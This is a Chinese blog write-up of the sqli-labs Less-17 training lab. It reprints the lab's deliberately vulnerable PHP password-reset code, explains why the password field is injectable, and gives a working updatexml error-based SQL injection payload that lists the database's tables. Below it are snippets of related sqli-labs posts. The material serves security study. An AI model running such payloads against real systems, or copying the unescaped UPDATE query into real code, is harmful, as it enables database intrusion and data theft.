2. 程式人生 > 其它 >sql-labs:less-17

sql-labs:less-17

阿新 發佈:2021-09-04

輸錯密碼,就來這一套

進行程式碼審計


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-17 Update Query- Error based - String</title>
</head>

<body bgcolor="#000000">

<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font>&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br></div>

<div  align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">

<div style="padding-top:10px; font-size:15px;">
 

<!--Form to post the contents -->
<form action="" name="form1" method="post">

  <div style="margin-top:15px; height:30px;">User Name &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: &nbsp;&nbsp;&nbsp;&nbsp;
    <input type="text"  name="uname" value=""/>  </div>
  
  <div> New Password : &nbsp; &nbsp;
    <input type="text" name="passwd" value=""/></div></br>
    <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
</form>
</div>
</div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">



<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,15);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];


//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);


// connectivity 
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";
	
	
	
		if (mysql_error())
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			print_r(mysql_error());
			echo "</br></br>";
			echo "</font>";
		}
		else
		{
			echo '<font color= "#FFFF00" font size = 3 >';
			//echo " You password has been successfully updated " ;		
			echo "<br>";
			echo "</font>";
		}
	
		echo '<img src="../images/flag1.jpg"   />';	
		//echo 'Your Password:' .$row['password'];
  		echo "</font>";
	


  	}
	else  
	{
		echo '<font size="4.5" color="#FFFF00">';
		//echo "Bug off you Silly Dumb hacker";
		echo "</br>";
		echo '<img src="../images/slap1.jpg"   />';
	
		echo "</font>";  
	}
}

?>


</font>
</div>
</body>
</html>

下面有幾個關鍵的程式碼需要認識:

function check_input($value) //過濾使用者名稱的輸入
	{
	if(!empty($value)) 
		{
		// truncation (see comments)
		$value = substr($value,0,15); //擷取前面15個字串
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc()) //檢視魔術符號是否開啟,開啟就返回 1 即magic_quotes_gpc=On
			{
			$value = stripslashes($value);  //刪除由addslashes()新增的反斜槓
			}

		// Quote if not a number
		if (!ctype_digit($value)) //判斷是不是數字,是數字就返回true
			{
			$value = "'" . mysql_real_escape_string($value) . "'"; //轉義字串
			}
		
	else
		{
		$value = intval($value); //轉換為整形
		}
	return $value;
	}

總之,經過一系列的過濾,想要在username上面下功夫是不可能的了,只能通過password進行注入

@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
	if($row)
	{
  		//echo '<font color= "#0000ff">';	
		$row1 = $row['username'];  	
		//echo 'Your Login name:'. $row1;
		$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
		mysql_query($update);
  		echo "<br>";

這就是查詢的原始碼,可以通過passwd下文章
這由於是修改密碼的模組,直接輸入admin即可成功修改,但是我們要查詢資料庫等資訊,就需要使用xml報錯注入:
下面是爆表的例子,payload不過多闡述了

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()
),0x7e),1)##

本文來自部落格園,作者:{Zeker62},轉載請註明原文連結:https://www.cnblogs.com/Zeker62/p/15225993.html

相關推薦

sql-labs:less-17

輸錯密碼,就來這一套 進行程式碼審計 <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式,頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式,頭部 Referer: 注入 Less-18 / Less-19 方

sql-labs-less26|sql注入

前言: 本關為sql注入系列第16關,此係類持續更新中,前面關卡可以參考此係列其他文章,如有錯誤的地方歡迎師傅指正,請看正文:

sql-labs-less32/less33|sql注入

前言: 由於less29-less31關需要使用JspStudy,但是官網的版本不支援Windows10環境(是我太菜,之前在XP虛擬機器搭建DVWA環境就搞不好),所以直接跳過了。本關為sql-labs系列less32和less33,此係列持續更

sqli-labs less-8(布林盲注)

less-8 布林盲注 首先利用?id=1\' and 1=1 --+和?id=1\' and 1=2 --+確定id的型別為單引號\'\'包裹。然後進行盲注。

sqli-labs-Less 1-10 之手工注入和sqlmap注入

宣告 學習SQL注入,提高網路安全能力,其實大部分環境下,測試人員做的工作都截止到漏洞發現,簡單回顧一下,漏洞發現的實質就是發現SQL語句的閉合方式,一般來講都圍繞著這幾個符號

sqli-labs less 6

技術標籤:sqli-labsmysql安全 一、輸入id,回顯正常 127.0.0.1/sqli-labs-master/Less-6/?id=1

less-17

less-17 基本測試 admin\' or 1=1 admin\') or 1=1 admin\" or 1=1 admin\") or 1=1 羞辱的回答 okok 檢視原始碼

sqli-labs less 13

13關的話也沒有什麼特殊的,和十二關的順序啊payload啊一模一樣,不過13關的閉合方式是’),所以直接參考12就好了 12連結:

sqli-labs less 22 Future Editions

技術標籤:sqli-labsmysql安全 一、22關與上一關也是基本相同,只不過閉合方式不一樣,看一下程式碼,可以看到這裡是用雙引號進行閉合

sqli-labs less 23 GET -Error based - strip comments

技術標籤:sqli-labsmysql安全 一、輸入id,頁面正常顯示,然後輸入單引號報錯,添加註釋符後還是報錯,就讓人懷疑多了括號,試了還是沒用

sqli-labs less 25-a GET -Blind based -All your OR&AND belong to us -Intiger based

技術標籤:sqli-labs資料庫mysql安全 一、輸入id,新增單引號後或者雙引號後,顯示錯誤頁面,說明是整形閉合沒有閉合符號,之後也和25關沒有什麼區別

SQL-labs布林注入

Less-5 確定注入點 對注入點測試獲取原始注入利用工具 由此可以看出是字元型注入需要閉合引號

SQL-LABS

SQL-LABS之旅,已經不是第一次做了,但是還是時常忘記一些東西,查來查去的挺麻煩,不如重新來一遍,這一遍就記好筆記。

檔案上傳 upload-labs Pass-17 二次渲染

Pass-17 審計原始碼 $is_upload = false; $msg = null; if (isset($_POST[\'submit\'])){ // 獲得上傳檔案的基本資訊,檔名,型別,大小,臨時檔案路徑

sql-lab 8-17 盲注加post傳參

布林型盲注length() 函式 返回字串的長度?id=1\' and (length(database()))=8 -- qwesubstr() 擷取字串 (語法:SUBSTR(str,pos,len);) ?id=1\' and (ascii(substr(database(),1,1)))=115-- qwe 返回正常,說明資料庫

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

17 SQL Union & As

1. 定義 解釋:Union操作符用於合併兩個或多個Select查詢的結果集;As操作符可以給欄位或資料表指定別名。

17.mysql 之SQL執行順序&正則表示式&函式使用

6.1 SQL執行順序 編寫順序 SELECT DISTINCT <select list> FROM <left_table> <join_type>